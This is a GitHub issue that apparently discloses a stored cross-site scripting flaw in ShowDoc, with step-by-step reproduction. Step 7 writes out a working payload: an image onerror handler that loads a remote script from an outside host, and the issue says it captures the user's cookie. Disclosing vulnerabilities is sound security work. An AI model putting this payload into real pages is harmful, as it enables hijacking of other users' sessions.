Skip to content

We found a stored xss vulnerability in ShowDoc #325

Closed
@farmsecHub

Description

@farmsecHub

Hello friend,we are farmsec security team,we found a stored xss vulnerability in ShowDoc:
1.Click to register
xss1
2.Fill in user information
xss2
Click to register.
3.Start a new project
xss3
Click new project.
4.Fill in the project information
xss4
Click submit.
5.Click on the new project
xss5
Click on the new project xss test
6.Click + to create a new page
xss6
7.Fill in the xss vulnerability test payload
payload:
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xxe.im/peKD';>
Click save
xss7
Access page
xss9
8.Get the user's cookie information
xss

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions